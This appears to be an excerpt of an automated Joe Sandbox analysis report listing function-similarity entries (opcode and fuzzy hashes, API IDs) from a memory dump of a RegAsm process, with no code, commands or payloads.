                                                                                                                                                                                                                • Opcode ID: a1abf26608bdd3bd75c3c7c675eb962f4bd3aa85f1225da50f038d88f940cb63
                                                                                                                                                                                                                • Instruction ID: 618b86bf15bcba3e6bb4b432628653469f60eedb0241b407a2bfa20550f3c4a2
                                                                                                                                                                                                                • Opcode Fuzzy Hash: a1abf26608bdd3bd75c3c7c675eb962f4bd3aa85f1225da50f038d88f940cb63
                                                                                                                                                                                                                • Instruction Fuzzy Hash: DDF1CF752083418FD724CF29C88176BBBE2AFD9304F08892EE5C587391E639E849CB56
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000007.00000002.1060946977.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                • Opcode ID: 6efb06bef768654ac0040adc0ce0407ad6a81646d1f38bc101bc1890ff5b14a9
                                                                                                                                                                                                                • Instruction ID: 0ccc64e59b4d2728c8f97c992ab3215f7c9b2ea39977d498fa6241edf0da81b1
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6efb06bef768654ac0040adc0ce0407ad6a81646d1f38bc101bc1890ff5b14a9
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5FC1FE752083518FD324CF24D8407ABBBF1FFC6704F01892DE999AB281D7B89909CB96
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000007.00000002.1060946977.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                • Opcode ID: eb22de691025e9604b791d4e65fae7c01e9dad6cb231151d9386f35b159a5ece
                                                                                                                                                                                                                • Instruction ID: e6547d7ce266cca01e0daee87e6cca674daf0050e72b53d60891a40b1d21bcce
                                                                                                                                                                                                                • Opcode Fuzzy Hash: eb22de691025e9604b791d4e65fae7c01e9dad6cb231151d9386f35b159a5ece
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 05B11771A083518FC719CF28C49062EBBE1AFC9314F198A6EE8D58B391C775EC05CB96
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000007.00000002.1060946977.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                • Opcode ID: 6b2cd09176f61552b1d6f2e1c9410f103319e7aaf139fadf8e6762b11bcf9ce4
                                                                                                                                                                                                                • Instruction ID: d5e2c306aed0e9f0a4523fdea87c2092727505e879cf5e08cc8bb1e74fe301f1
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6b2cd09176f61552b1d6f2e1c9410f103319e7aaf139fadf8e6762b11bcf9ce4
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5E91D235A143018BD714DF18C850A2BB7E2FF99750F19A47EE9858B361EB34EC15CB8A
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000007.00000002.1060946977.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                • Opcode ID: 6925b7b30ae1d64aa03c94434c67ba7450ac3eddcb7f7670797234d86eb0a273
                                                                                                                                                                                                                • Instruction ID: 0d33a859858de1e777918ecbbea9d87bf78b6d517e5369397cfe6a83e4d9b11e
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6925b7b30ae1d64aa03c94434c67ba7450ac3eddcb7f7670797234d86eb0a273
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1051AE75A046019FC714DF18C480927B7A1FF89324F15467EF899AB392DA39EC42CF9A
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000007.00000002.1060946977.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                • Opcode ID: 984d738aec387f28cc7eaec4ca5c67fb99259926ca56a74be65a122adab2f618
                                                                                                                                                                                                                • Instruction ID: 93b374079003cf47803463db6aed036ab20df5fd0c0726eead366e94e35a9902
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 984d738aec387f28cc7eaec4ca5c67fb99259926ca56a74be65a122adab2f618
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6D41DC74608311CBD3109F54E85236BB3F0FF96714F04892DE9859B3A1E7B8D944CB4A
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000007.00000002.1060946977.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                • Opcode ID: ae03d0efe5d3416f09bdfbd8c7dc735336d366e1cf58bc6a7fb73e4b6a30e704
                                                                                                                                                                                                                • Instruction ID: 800bc67bdf34f8eb84e2d2acdca91b3e4e4a41be4a419d3d02d7bdb166052edc
                                                                                                                                                                                                                • Opcode Fuzzy Hash: ae03d0efe5d3416f09bdfbd8c7dc735336d366e1cf58bc6a7fb73e4b6a30e704
                                                                                                                                                                                                                • Instruction Fuzzy Hash: AC3126765093108BD311CF19C88576BFBE0EBC9719F18A97DF4849B351CB7889068BDA
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000007.00000002.1060946977.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                • Opcode ID: f8eb8d57d4933a829067fb9749367417295eda5b282249417eec4ffb832f8d17
                                                                                                                                                                                                                • Instruction ID: 4c073cf3540596e04badca7617fc7e9bc7deaedfcf28b63a0a35df37db274471
                                                                                                                                                                                                                • Opcode Fuzzy Hash: f8eb8d57d4933a829067fb9749367417295eda5b282249417eec4ffb832f8d17
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5731A7B1604200DBD7559F19C88096BB7E1EFC4318F18893EE999A73C1D339DC52CB8A
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000007.00000002.1060946977.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                • Opcode ID: 566f3fa44258c39495b3ff392f0dd1104c074346eb22a3ef3670f1add33d93fc
                                                                                                                                                                                                                • Instruction ID: bb6f8750bbd66f049743e392adceb248b911c9de5a183c3136beb1899a1fcac4
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 566f3fa44258c39495b3ff392f0dd1104c074346eb22a3ef3670f1add33d93fc
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6821B6B1904211C7DB209F24D8213A7B3F2FFE5364F29861DE8995B390E7799881C785
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000007.00000002.1060946977.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                • Opcode ID: 69804dbb9d62350fdcf614b4d4a0a44e0fa0173df43693d40f72767662333e9d
                                                                                                                                                                                                                • Instruction ID: 668cd533223910cd228620b75c64fe88c6fb7912326b3a219a5fe6b3fc7877d8
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 69804dbb9d62350fdcf614b4d4a0a44e0fa0173df43693d40f72767662333e9d
                                                                                                                                                                                                                • Instruction Fuzzy Hash: BA11E13AA153144BD7205A289D8073BB667EBDA752F39A47EE8842B345CB388C0183E5
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000007.00000002.1060946977.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                • Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                                                                                                                                                                • Instruction ID: 0227e66d0875c2311f38e4fe89d52de8498e6a121306d11f672e0d7d7f24ec6b
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3A115933A041E50FC3269D3C8500566BFE31B97634F28539AF0F98B2D2C2268D8B9318
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000007.00000002.1060946977.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                • Opcode ID: 7ab600a1f1ac4be9712db55490683db8e3c353756ab72a2fb5bfbe5eeaa2fdbd
                                                                                                                                                                                                                • Instruction ID: 6336afc45053181afdc7446a70e9b56c12bbfa34acc44c348cd50f34c0f480c3
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7ab600a1f1ac4be9712db55490683db8e3c353756ab72a2fb5bfbe5eeaa2fdbd
                                                                                                                                                                                                                • Instruction Fuzzy Hash: A40192B170231147E6209F52E8C573BB2A89F84708F08453EE8089B381EF79EC26C299
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000007.00000002.1060946977.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                • Opcode ID: c34800b2d6e2c669b3003c1a405595c7692c1fe1220db37c76c0ab0c7303bfe8
                                                                                                                                                                                                                • Instruction ID: 5bd34d858dd06a56d78af1502e90c44f0a6944959865b12bf66644d78649c3bb
                                                                                                                                                                                                                • Opcode Fuzzy Hash: c34800b2d6e2c669b3003c1a405595c7692c1fe1220db37c76c0ab0c7303bfe8
                                                                                                                                                                                                                • Instruction Fuzzy Hash: FF2122714083818FD735CF14D8506DFBBE2EB86304F00882DD89C9B262DB329A16CBC6
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000007.00000002.1060946977.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                • Opcode ID: a03e5394408b1fdc976f891483c031e2c6c7e2b4ccc8eb1f281f531e604d31db
                                                                                                                                                                                                                • Instruction ID: b9eed158d1a4c5a8f95884017e16127f008288ee18346c9cf546a7ae42f2f0ed
                                                                                                                                                                                                                • Opcode Fuzzy Hash: a03e5394408b1fdc976f891483c031e2c6c7e2b4ccc8eb1f281f531e604d31db
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 54F0F62AB5C31A0BE620DEF99CC0827F3D6D7CA254B19423DF941D3391D479F80282A6
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000007.00000002.1060946977.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                • Opcode ID: 669bc889fa446b6e7cf18cce93b22bde3a746c92e4791af13414d688a4bd588a
                                                                                                                                                                                                                • Instruction ID: 3eef60f30b737d7551fafe8816eea61c88680f234307081c63391da5742a7ff7
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 669bc889fa446b6e7cf18cce93b22bde3a746c92e4791af13414d688a4bd588a
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 590171F4C10204BFCB50FFB9E9474AEBE34EB06251F50422AF8407724AD231451A8BEB
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000007.00000002.1060946977.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                • Opcode ID: dc6a665356546ab3159159aec1b5944d5590de67b019fc03f11f8fcb1e714f0f
                                                                                                                                                                                                                • Instruction ID: 143535b4edc0e874a23990f2e6068331c86e6e446665e0b03c92cf62ce2225ea
                                                                                                                                                                                                                • Opcode Fuzzy Hash: dc6a665356546ab3159159aec1b5944d5590de67b019fc03f11f8fcb1e714f0f
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 79B092A9C0A810C7E4113F11BD4E4AAB034891B209F042136E80A7A243B63AD61A40AF